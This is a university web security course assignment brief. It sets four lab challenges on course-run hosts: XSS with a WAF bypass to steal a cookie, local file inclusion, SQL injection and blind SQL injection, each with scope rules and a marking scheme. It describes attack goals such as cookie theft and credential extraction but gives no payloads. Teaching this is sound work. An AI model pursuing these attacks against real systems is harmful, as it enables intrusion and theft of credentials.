School of Computing and Information Systems COMP90074: Web Security Assignment 2 Due date: No later than 11:59pm on Sunday 10th May 2020 Weight: 12.5% Marked out of 100 Note: All challenges have a flag in the format: flag{something_here} Submission format All students must submit a single zip file with all their code and a PDF version of their report. The zip must be named -assignment2.zip (e.g. testuser1-assignment2.zip). All code for each challenge must be clearly labelled and stored in a separate file, so it is not confused with the code for other challenges. Finally, all code must be referenced within the report. This implies that there will be code in both the report and the separate code file for each task. If you have any questions or queries, please feel free to reach out via the discussion board, or by contacting Sajeeb (the lecturer). Report Writing (5%) For this assignment, we expect a professionally written report, provided to the client (teaching staff), explaining and specifying each issue, alongside the process of exploitation and steps to reproduce the exploits. Also, please ensure that the flag is displayed in a screenshot at the end of each challenge’s writeup. We will not be accepting any flags that are not displayed in a screenshot. Challenge 1: Basic WAF challenge (22.5%) sml555 is a 1337 Security Researcher (aka Hacker) who has discovered a serious vulnerability. He decided to create a “Super Secure Blog” to publish his research. In his excitement to publish quickly, he accidently forgot to fully protect against all XSS vulnerabilities. As a fellow Security Researcher, sml555 has asked you to perform a security assessment on his blog and identify any issues. Please be aware that being security conscious, sml555 is protecting his blog with a basic WAF. You will need to find a way to bypass the WAF in order to complete this task. Your task is: 1. Visit the website (http://chall1.unimelb.life) 2. Perform a manual Penetration Test and identify the following vulnerability: a. XSS 3. Use the vulnerability to perform the following: a. Steal the victims cookie and authenticate as the victim 4. Document your findings with full details and screenshots so that sml555 can reproduce these findings. Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date. Scope Testing must only be performed on http://chall1.unimelb.life Testing must be manual only. Manual tools may be used (Burp, Zap, etc), however you may not use the automated scanning capabilities of these tools. No automated scanning or automated tools can be used. No load testing, denial of service (DOS) or distributed denial of service (DDOS) attacks. HINT: Take a look at the marking scheme for the process to complete this challenge! Challenge 2: Local File Inclusion (20%) In true Agile fashion, a junior developer at !SlowDevs Pty Ltd. created a local copy of the Agile Manifesto for easy accessibility on the organisation’s intranet. Due to inexperience, the junior developer accidently exposed the website to the internet. To accommodate for the international teams, the developer has added a language translation layer to the web application. Prior to placing this website in the production environment, !SlowDevs Pty Ltd. has contracted you to perform a security assessment of the new website. Your task is: 1. Visit the website (http://chall2.unimelb.life) 2. Perform a manual Penetration Test and identify the following vulnerability: a. LFI 3. Use the vulnerability to perform the following: a. Steal the configuration file 4. Document your findings with full details and screenshots so that !SlowDevs Pty Ltd. can reproduce these findings. Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date. Scope Testing must only be performed on http://chall2.unimelb.life Testing must be manual only. Manual tools may be used (Burp, Zap, etc), however you may not use the automated scanning capabilities of these tools. No automated scanning or automated tools can be used. No load testing, denial of service (DOS) or distributed denial of service (DDOS) attacks. HINT: Take a look at the marking scheme for the process to complete this challenge! Challenge 3: SQL Injection from another DB (22.5%) Entrepreneurs Я Us saw a growing market for supplying white hat hackers with hacking tools, being entrepreneurs they realised that they needed to be quick to market and have rapidly developed a webstore branded “31337 Store”. Unfortunately, while being quick to market makes good business sense, it meant that they took some shortcuts during the development and testing process, and therefore have left a few vulnerabilities in their code. Entrepreneurs Я Us has hired you as a security consultant to perform a penetration test on “31337 Store” prior to their big go-live event planned on the 10th of May. Your task is: 1. Visit the website (http://chall3.unimelb.life) 2. Perform a manual Penetration Test and identify the following vulnerability: a. SQL Injection 3. Use the vulnerability to perform the following: a. CPanel credentials and find the flag 4. Document your findings with full details and screenshots so that Entrepreneurs Я Us can reproduce these findings. Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date. Scope Testing must only be performed on http://chall3.unimelb.life Testing must be manual only. Manual tools may be used (Burp, Zap, etc), however you may not use the automated scanning capabilities of these tools. No automated scanning or automated tools can be used. No load testing, denial of service (DOS) or distributed denial of service (DDOS) attacks. HINT: Take a look at the marking scheme for the process to complete this challenge! Challenge 4: Blind SQL Injection (30%) VISION®, a large database company, has created an admin backend for one of their clients to self-manage their database. As this backend was created using completely new code, VISION® has hired you as a security consultant to perform a penetration test on this admin backend and confirm whether it is secure or not. Your task is: 1. Visit the website (http://chall4.unimelb.life) 2. Perform a manual Penetration Test and identify the following vulnerability: a. SQL Injection 3. Use the vulnerability to perform the following: a. Extract credentials b. Log into the application and find the flag 4. Document your findings with full details and screenshots so that VISION® can reproduce these findings. Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date. Scope Testing must only be performed on http://chall4.unimelb.life Testing must be manual only. Manual tools may be used (Burp, Zap, etc), however you may not use the automated scanning capabilities of these tools. No automated scanning or automated tools can be used. No load testing, denial of service (DOS) or distributed denial of service (DDOS) attacks. HINT: Take a look at the marking scheme for the process to complete this challenge! Note: For this challenge, we expect a single, end-to-end exploit (written in python3) that performs the blind SQL injection and extracts the credentials. This script will then authenticate into the application and extract the flag. Marking Scheme Repor
t Writing (5%) Task / Subtask Percentage Awarded on Full Completion Accumulated Percentage Identify XSS (includes WAF bypass) 50% 50% Steal victim’s cookie 25% 75% Authenticate as victim 25% 100% Challenge 1: Basic WAF challenge (22.5%) Task / Subtask Percentage Awarded on Full Completion Accumulated Percentage Identify XSS (includes WAF bypass) 50% 50% Steal victim’s cookie 25% 75% Authenticate as victim 25% 100% Challenge 2: Local File Inclusion (20%) Task / Subtask Percentage Awarded on Full Completion Accumulated Percentage Identify LFI 15% 15% Extract any PHP file (server-side content) from the server using LFI 50% 65% Steal flag config file using LFI 35% 100% Challenge 3: SQL Injection from another DB (22.5%) Task / Subtask Percentage Awarded on Full Completion Accumulated Percentage Identify SQL injection (prove with screenshot) 30% 30% Identify CPanel database name and tables 20% 50% Leak credentials from CPanel database 35% 85% Authenticate into CPanel and find the flag 15% 100% Challenge 4: Blind SQL Injection (30%) Task / Subtask Percentage Awarded on Full Completion Accumulated Percentage Identify blind SQL injection (prove with screenshot) 30% 30% Identify users database table using blind SQL injection 25% 55% Leak a victim user’s password 30% 85% Authenticate as the victim user and retrieve the flag 15% 100%
